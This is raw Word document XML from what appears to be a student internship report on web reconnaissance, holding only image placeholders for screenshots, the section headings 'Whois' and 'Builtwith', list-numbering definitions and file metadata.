          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="118608B2" wp14:editId="0E381044">
            <wp:extent cx="5730478" cy="4251366"/>
            <wp:effectExtent l="0" t="0" r="3810" b="0"/>
            <wp:docPr id="43" name="Picture 43" descr="E:\Amit Internship\Google dorking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mit Internship\Google dorking\Screenshot (16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85" cy="4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7FEB" w14:textId="6C18474C" w:rsidR="00F30973" w:rsidRDefault="0073365E" w:rsidP="008072B3">
      <w:pPr>
        <w:spacing w:before="240"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0073365E">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4CF01251" wp14:editId="09FA3A99">
            <wp:extent cx="5731510" cy="3221300"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="44" name="Picture 44" descr="E:\Amit Internship\Google dorking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mit Internship\Google dorking\Screenshot (17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9C5F" w14:textId="5FA6ACC3" w:rsidR="00495340" w:rsidRDefault="00495340" w:rsidP="008072B3">
      <w:pPr>
        <w:spacing w:before="240"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="061FC00A" w14:textId="0B16E5A0" w:rsidR="00495340" w:rsidRDefault="00495340" w:rsidP="008072B3">
      <w:pPr>
        <w:spacing w:before="240"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0873E220" w14:textId="2CA5E084" w:rsidR="00495340" w:rsidRPr="00495340" w:rsidRDefault="00495340" w:rsidP="008072B3">
      <w:pPr>
        <w:spacing w:before="240"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00495340">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>c) Whois</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19F62816" w14:textId="6FD9D38D" w:rsidR="00495340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42C1A05" wp14:editId="5B4E8F3C">
            <wp:extent cx="5731510" cy="3223895"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="117547641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B180" w14:textId="4C8D189E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69A7CCA1" wp14:editId="7918EEC6">
            <wp:extent cx="5731510" cy="3223895"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="210717780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3472" w14:textId="33B65E71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3F0B4D1" wp14:editId="2E9560FC">
            <wp:extent cx="5731510" cy="3223895"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="21137544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FBD4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0C1F922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89EF9EC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D5086D2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651E60C" w14:textId="75E6AB8F" w:rsidR="00F30973" w:rsidRPr="00244EB6" w:rsidRDefault="00F3097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d)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Builtwith</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5CA9938C" w14:textId="2B0B3F7B" w:rsidR="00495340" w:rsidRDefault="00A46E0F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A46E0F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7333338B" wp14:editId="0E8A8869">
            <wp:extent cx="5731510" cy="3221300"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="45" name="Picture 45" descr="E:\Amit Internship\built with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mit Internship\built with\Screenshot (18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F392" w14:textId="77777777" w:rsidR="00495340" w:rsidRPr="00CE2612" w:rsidRDefault="00495340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4293A95" w14:textId="7A21F2BE" w:rsidR="00436723" w:rsidRDefault="00A46E0F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A46E0F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1D97B144" wp14:editId="0FD44864">
            <wp:extent cx="5731510" cy="3221300"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="46" name="Picture 46" descr="E:\Amit Internship\built with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mit Internship\built with\Screenshot (19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B52420B" w14:textId="77777777" w:rsidR="00EC5CC6" w:rsidRPr="002E272C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sectPr w:rsidR="00EC5CC6" w:rsidRPr="002E272C" w:rsidSect="00F860EF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F40E2"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="753ACC12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69DC"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="2DE40ACA"/>
    <w:lvl w:ilvl="0" w:tplc="05168A40">
      <w:start w:val="5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4CA63B75"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="43B271F6"/>
    <w:lvl w:ilvl="0" w:tplc="FB3E285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1E9B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="82C2E0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2122"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="7D4098B8"/>
    <w:lvl w:ilvl="0" w:tplc="F7C61F3A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1A"/>
    <w:rsid w:val="00013752"/>
    <w:rsid w:val="00054E31"/>
    <w:rsid w:val="00084D05"/>
    <w:rsid w:val="00097CB4"/>
    <w:rsid w:val="00114BAE"/>
    <w:rsid w:val="00160072"/>
    <w:rsid w:val="0016470B"/>
    <w:rsid w:val="001C258F"/>
    <w:rsid w:val="001E6B80"/>
    <w:rsid w:val="00244EB6"/>
    <w:rsid w:val="002B689C"/>
    <w:rsid w:val="002D2E68"/>
    <w:rsid w:val="002E272C"/>
    <w:rsid w:val="003013E9"/>
    <w:rsid w:val="00340902"/>
    <w:rsid w:val="003E00E6"/>
    <w:rsid w:val="00400BCA"/>
    <w:rsid w:val="004032A2"/>
    <w:rsid w:val="00436723"/>
    <w:rsid w:val="00445476"/>
    <w:rsid w:val="00495340"/>
    <w:rsid w:val="004A4454"/>
    <w:rsid w:val="004D1BD0"/>
    <w:rsid w:val="005207BD"/>
    <w:rsid w:val="00530806"/>
    <w:rsid w:val="00541E37"/>
    <w:rsid w:val="00542EEA"/>
    <w:rsid w:val="005634F1"/>
    <w:rsid w:val="00592A9D"/>
    <w:rsid w:val="005C61FB"/>
    <w:rsid w:val="00615734"/>
    <w:rsid w:val="00654C64"/>
    <w:rsid w:val="00692915"/>
    <w:rsid w:val="006C722D"/>
    <w:rsid w:val="0072357E"/>
    <w:rsid w:val="00727F0C"/>
    <w:rsid w:val="0073365E"/>
    <w:rsid w:val="007523A3"/>
    <w:rsid w:val="007B377D"/>
    <w:rsid w:val="007B4D5F"/>
    <w:rsid w:val="007C2C4B"/>
    <w:rsid w:val="008072B3"/>
    <w:rsid w:val="008955CF"/>
    <w:rsid w:val="008E1AEB"/>
    <w:rsid w:val="009D69B4"/>
    <w:rsid w:val="00A46E0F"/>
    <w:rsid w:val="00A77F20"/>
    <w:rsid w:val="00A93FF2"/>
    <w:rsid w:val="00AD6465"/>
    <w:rsid w:val="00AF3B9F"/>
    <w:rsid w:val="00B375E7"/>
    <w:rsid w:val="00B52C16"/>
    <w:rsid w:val="00B52E56"/>
    <w:rsid w:val="00BA4D50"/>
    <w:rsid w:val="00BA6236"/>
    <w:rsid w:val="00BB30EF"/>
    <w:rsid w:val="00BD79F2"/>
    <w:rsid w:val="00C23384"/>
    <w:rsid w:val="00CE2612"/>
    <w:rsid w:val="00D103D7"/>
    <w:rsid w:val="00D6161A"/>
    <w:rsid w:val="00E24BDF"/>
    <w:rsid w:val="00E24F95"/>
    <w:rsid w:val="00E6008F"/>
    <w:rsid w:val="00E70875"/>
    <w:rsid w:val="00EA33BC"/>
    <w:rsid w:val="00EA5507"/>
    <w:rsid w:val="00EB2C2D"/>
    <w:rsid w:val="00EC5CC6"/>
    <w:rsid w:val="00ED7509"/>
    <w:rsid w:val="00EE5359"/>
    <w:rsid w:val="00F26906"/>
    <w:rsid w:val="00F30973"/>
    <w:rsid w:val="00F61CEC"/>
    <w:rsid w:val="00F80E7C"/>
    <w:rsid w:val="00F860EF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FF44"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{48B3CF68-C545-45DB-AC68-B37BE46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7717-CECD-4730-8952-6F6E6F5A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8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pujar;intenship</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Microsoft account</cp:lastModifiedBy>
  <cp:revision>68</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-02-18T13:05:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-04-25T15:33:00Z</dcterms:modified>
</cp:coreProperties>
</file>